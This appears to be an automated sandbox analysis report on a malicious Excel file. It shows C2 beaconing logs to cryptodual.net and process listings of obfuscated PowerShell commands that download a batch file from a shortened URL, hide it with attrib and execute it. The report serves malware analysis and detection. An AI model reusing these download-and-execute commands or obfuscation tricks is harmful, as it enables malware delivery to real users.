                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MOaaDS2XW8RzmV%2FLo0nn%2FpWj2ASkPOYJiz6tmDiYkPCmonnxg%2Bay4snVrnvobln0MQu0Y61OONLSTIduXckG%2BzbXFjjmOGk2y0c27F3mOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4d149b1c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:25.994359016 CET1371OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:26.058743954 CET1372INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037570f0000c77959b5b000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sg5%2BYF9ymGVDVl8ysP1KXOsQlBv9tovxikhl9l%2BMSp1ELv95FeBDg5ExesnZj1Tlw%2F8UX%2Fw4DvBFASWcP7%2BLKgwkRhSJU3s3XqpuAtnXBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4d1baa3c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:31.060841084 CET1375OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:31.129498959 CET1375INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770376ada0000c77952a2a000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4pjQPhefspjiQSDplmHj8qKX8hA%2FcYFmMoRBv8nhVAAyM%2BCBpUhj%2FwNOdmKecXbP8Fc%2BvTCndwgu5pTzAG9pm2F4ziu%2FwBwmh6oKGEQJjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4f15c9ec779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:31.131783962 CET1376OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:31.210427999 CET1376INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770376b210000c7791d13f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fgqXG2jx3UhH0KXQGfWxNwc2SBUyTPbeOaTD72FXYn1aJYZLjvijVUKTu1Z6uJx5T3amURYfbSK3thGLE7%2FhoAjbVh6H1eBPM7066SLdWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4f1cdafc779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:31.630044937 CET1377OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:31.695410013 CET1378INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770376d120000c779843b1000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WPBnKZOX4WJLPbdyNL52TQkH%2BYKAoXp%2Bkfi6m3rRPxXAizpx37ehvmUWaTvwcYYcSREwKqmPxM9xgXM767gdm15NsLKBFeNcQi4Vj31ePQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4f4ec71c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:31.695956945 CET1378OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:31.757940054 CET1379INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770376d550000c77978835000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NNt%2FhyqK6o9Hjw%2BxR6O3CfJ3vQeTfastGa3MfCktah0ldvetzV%2F2I4EnNzzMy6wz5w9a7Qk9wRhoZ8hne6iQbq60rF%2B3mrYrvYmn7ld2Tw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4f55d2bc779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:36.756045103 CET1383OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:36.835577965 CET1383INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703781190000c77937b66000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yle8E8FgSFU5XDpdFaiC3jSIKmyUGxpvzFJKcQpEo5CHF89zWg2K34CKEPLoz5Dh44orVK8YANKNs4zcvotnggFU4CtwgDwS1b%2BOZ6hu0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f514fa54c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:36.836218119 CET1384OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:36.898669004 CET1384INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703781680000c7791d2e7000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UAOIx%2BZmxDpwvXrauC0PTUr9Es8y%2FmHDohtys%2B3R5rqCyI68TM380dFxp6zZG9avpGFdD2HFCa5%2BJFfZPMFDR6B09QlCbYd01qm25UZOmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f5157b54c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:36.899524927 CET1385OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:36.964807987 CET1385INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703781a70000c779218b4000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=deaeoZM7W9h6gwTqL5ruHJLlnQrDTBIhEwX3YO2MjexPXlKlekVYAGbkR%2Fe28tSRFArdD1l81%2BBLYa2%2FRreYWPZa%2FQXtA2Wiji9hCI6c%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f515dc2ec779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:36.965912104 CET1386OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:37.037558079 CET1387INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703781ea0000c7797c24f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LV2IvDXCVwrfe49OpnYekYXCIH9e4A%2FiVFCIm4V4Ks7ewrY2PtZdhoQUEqWdyL%2Fu9Y7Fv%2B7AhxRQ0vrPNXp5E0NFNFk4K4InsFdyBTJqWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f5164ccfc779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:42.043807983 CET1391OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:42.134742022 CET1391INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703795c00000c7798429d000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PLojQtEHydZuDHzzzJtikiUmYh%2Br26DiT8Gsq2dRR9oPzQOQkg6dr4zFJV8Wth%2B9LHTabasWPR62%2F2bRf%2FZoMJ5pVATofIh0%2BBcyxKxrbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f535fcabc779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:42.135365963 CET1392OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:42.210437059 CET1392INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037961b0000c7797b979000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cJveEi5o2AXnPZEGJeweACBujj1zHzxlmBL6iJBHKU%2BbE51YM0gxlzKrLs445F5A1xWisuNePYVaYqVyoxa%2Bc6wKWVCc5nFFxJGNp5Hzag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f5369dbfc779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:42.211040020 CET1393OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:42.273996115 CET1393INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703796670000c7793d38e000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hsBSHKJCeMJ3zUf6ywPWvocVMy0bAsl1HTbqpBLdmmpxILqzu7gF7CZ0vBNL7qU4%2BFCwOUspA2vdHuwQrybT7ibuULReuk%2BaAJXOzMs5tQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f5370eb8c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:42.274714947 CET1394OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:42.778896093 CET1396INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703796a60000c7791d08b000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2F39emKgVg9G6RjkR%2B5tvtxhEdXpKBQIMP6mMIkqyAbc7eU64lSNXoZYTjkTGI%2B%2B7d5j2QXartg15DTUilvNKmhJ%2FwnXh%2FRyKmdk4bqBxEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f5377f41c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:47.786000013 CET1399OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:47.857158899 CET1400INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037ac2e0000c7797c1cc000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=eutcaecLXRHl%2FYpqMsLYbB6FRKhlPgCnwuuVku1tJTHGtyZtr%2FQ4vwTgAVZOJK0PYE%2FruMswWkpn3VtKMfC4%2Bq9Xd2epd98xVhZfx4N1rw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f559ec00c779-AMS
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                HTTPS Packets

                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                Jan 4, 2021 19:15:31.228230953 CET172.67.8.238443192.168.2.2249167CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027
                                                                Jan 4, 2021 19:15:41.591857910 CET172.67.167.122443192.168.2.2249170CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Aug 18 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Wed Aug 18 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:19:14:45
                                                                Start date:04/01/2021
                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                Imagebase:0x13f950000
                                                                File size:27641504 bytes
                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:19:14:48
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                                Imagebase:0x4aaa0000
                                                                File size:345088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:19:14:48
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                                Imagebase:0x4aaa0000
                                                                File size:345088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:19:14:48
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                                Imagebase:0x4aaa0000
                                                                File size:345088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:19:14:49
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                                Imagebase:0x13fa60000
                                                                File size:473600 bytes
                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                General

                                                                Start time:19:14:49
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                                Imagebase:0x4aaa0000
                                                                File size:345088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:19:14:49
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                                Imagebase:0x13fa60000
                                                                File size:473600 bytes
                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                General

                                                                Start time:19:14:49
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
                                                                Imagebase:0x4aaa0000
                                                                File size:345088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:19:14:49
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                Imagebase:0xff0e0000
                                                                File size:27136 bytes
                                                                MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:19:14:50
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                                Imagebase:0x13fa60000
                                                                File size:473600 bytes
                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                General

                                                                Start time:19:14:50
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                                Imagebase:0x13fa60000
                                                                File size:473600 bytes
                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                General

                                                                Start time:19:14:50
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
                                                                Imagebase:0x13fa60000
                                                                File size:473600 bytes
                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, Author: Florian Roth
                                                                Reputation:high

                                                                General

                                                                Start time:19:14:53
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\attrib.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                                Imagebase:0xff7c0000
                                                                File size:18432 bytes
                                                                MD5 hash:C65C20C89A255517F11DD18B056CADB5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:19:15:00
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
                                                                Imagebase:0x4aaa0000
                                                                File size:345088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:19:15:00
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\mode.com
                                                                Wow64 process (32bit):false
                                                                Commandline:mode 18,1
